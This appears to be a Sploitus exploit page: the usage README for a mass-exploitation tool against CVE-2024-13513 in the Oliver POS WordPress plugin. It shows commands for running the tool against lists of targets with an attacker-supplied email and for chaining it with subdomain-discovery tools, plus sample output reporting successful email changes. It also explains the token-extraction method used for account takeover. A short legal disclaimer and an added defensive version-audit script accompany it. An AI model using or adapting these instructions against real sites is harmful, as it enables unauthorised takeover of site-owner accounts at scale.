## https://sploitus.com/exploit?id=020F514E-BEB1-59A3-A837-6E26E49BBF3D
Usage
Basic Usage
```bash
python3 exploit.py -l targets.txt -e your-email@example.com
```
Advanced Usage
```bash
python3 exploit.py \
    -l targets.txt \
    -e attacker@email.com \
    -t 100 \
    -o /path/to/results
```
Parameters Explanation
| Parameter | Description | Required | Default |
|---|---|---|---|
| -l, --list | Path to file containing target URLs | ✅ Yes | - |
| -e, --email | Email address for password reset | ✅ Yes | - |
| -t, --threads | Number of concurrent threads | ❌ No | 50 |
| -o, --output | Output directory for results | ❌ No | Current directory |
Input File Format
Create a text file (targets.txt) with one URL per line:

```text
example.com
https://site1.com
http://site2.com
http://192.168.1.100/wordpress
https://vulnerable-site.org/blog
```
Output Files
The tool generates several output files:

vulnerable_targets.txt - All detected vulnerable websites

successfully_exploited.txt - Successfully exploited targets with email

Console Output - Real-time scanning progress and statistics

Example Execution
```bash
python3 exploit.py -l my_targets.txt -e test@hacker.com -t 80

[ INFO ] Loaded 150 unique targets
[ INFO ] Using email: test@hacker.com
[ INFO ] Threads: 80
[ INFO ] Starting scan...

[ CHECKING ] http://example.com/
[ VULNERABLE ] http://example.com/
[ SUCCESS ] Email changed successfully: http://example.com/
[ NOT FOUND ] http://site2.com/
[ PATCHED ] http://site3.com/

==================================================
SCAN STATISTICS:
Checked:    150
Vulnerable: 23
Exploited:  18
Failed:     5
==================================================
[ INFO ] Execution time: 45.23 seconds
```
Advanced Examples
Quick Scan with High Threads
```bash
python3 exploit.py -l urls.txt -e admin@test.com -t 200
```
Save Results to Specific Directory
```bash
python3 exploit.py -l targets.txt -e test@domain.com -o ./scan_results
```
Combine with Other Tools
```bash
# Use with subfinder and httpx
subfinder -d example.com | httpx -silent | tee targets.txt
python3 exploit.py -l targets.txt -e attack@email.com -t 100
```
Important Notes
Legal Disclaimer
⚠️ This tool is for educational and authorized penetration testing purposes only.

Only use on websites you own or have explicit permission to test

Unauthorized access to computer systems is illegal

The authors are not responsible for misuse

Technical Details
Vulnerability: CVE-2024-13513 - Oliver POS Plugin < 2.4.2.4

Impact: Allows unauthenticated email change for password reset

Detection: Checks plugin version and existence

Exploitation: Extracts client token from logs and sends crafted request
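
The version condition stated above (Oliver POS Plugin < 2.4.2.4), as an added defender-side example that is not part of the original tool: it audits a plugin inventory of your own sites for installs below the fixed version. The slug `oliver-pos`, the sample hostnames and the CSV layout (a `site` column prepended to `wp plugin list --fields=name,status,version --format=csv` output) are assumptions, and the inventory is constructed.

```python
import csv
import io
import re

FIXED_VERSION = "2.4.2.4"   # from the page: versions below this are affected
PLUGIN_SLUG = "oliver-pos"  # assumption: the plugin's directory name / slug

# Constructed sample inventory (assumed layout: site + wp-cli name,status,version).
SAMPLE_INVENTORY = """\
site,name,status,version
shop-a.internal.example,oliver-pos,active,2.4.2.3
shop-b.internal.example,oliver-pos,active,2.4.2.4
shop-c.internal.example,oliver-pos,inactive,2.4.2
shop-d.internal.example,woocommerce,active,9.1.0
shop-e.internal.example,oliver-pos,active,2.10.0
"""


def parse_version(text):
    """'2.4.2.3' -> (2, 4, 2, 3). A part without leading digits counts as 0."""
    parts = []
    for piece in text.strip().split("."):
        match = re.match(r"\d+", piece)
        parts.append(int(match.group()) if match else 0)
    return tuple(parts)


def is_affected(version, fixed=FIXED_VERSION):
    """Numeric, zero-padded comparison: '2.4.2' is treated as 2.4.2.0."""
    a, b = parse_version(version), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def audit(inventory_csv):
    """Return (site, version, status) for every install below the fixed version."""
    findings = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        if row["name"] == PLUGIN_SLUG and is_affected(row["version"]):
            findings.append((row["site"], row["version"], row["status"]))
    return findings


if __name__ == "__main__":
    for site, version, status in audit(SAMPLE_INVENTORY):
        print(f"{site}: {PLUGIN_SLUG} {version} ({status}) -> update to {FIXED_VERSION} or later")
```

The parts are compared as integers because a plain string comparison would wrongly rank 2.10.0 below 2.4.2.4.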

Performance Tips
Use 50-150 threads for optimal performance

Ensure stable internet connection

Use quality target lists for better results

Monitor system resources during execution

Troubleshooting
Common Issues:

```bash
# File not found
[ ERROR ] File not found: targets.txt

# Invalid email format
[ ERROR ] Invalid email format

# Network issues
[ CONN ERROR ] example.com
[ TIMEOUT ] example.com
```
Solutions:

Ensure target file exists and is readable

Use valid email address format

Check internet connection and firewall settings

Reduce thread count if experiencing timeouts

Output Interpretation
VULNERABLE: Website has vulnerable plugin version

SUCCESS: Email successfully changed on target

PATCHED: Plugin exists but version is patched

NOT FOUND: Plugin not installed or accessible

CONN ERROR: Connection failed

TIMEOUT: Request timed out

This tool provides comprehensive scanning and exploitation capabilities for security professionals conducting authorized vulnerability assessments.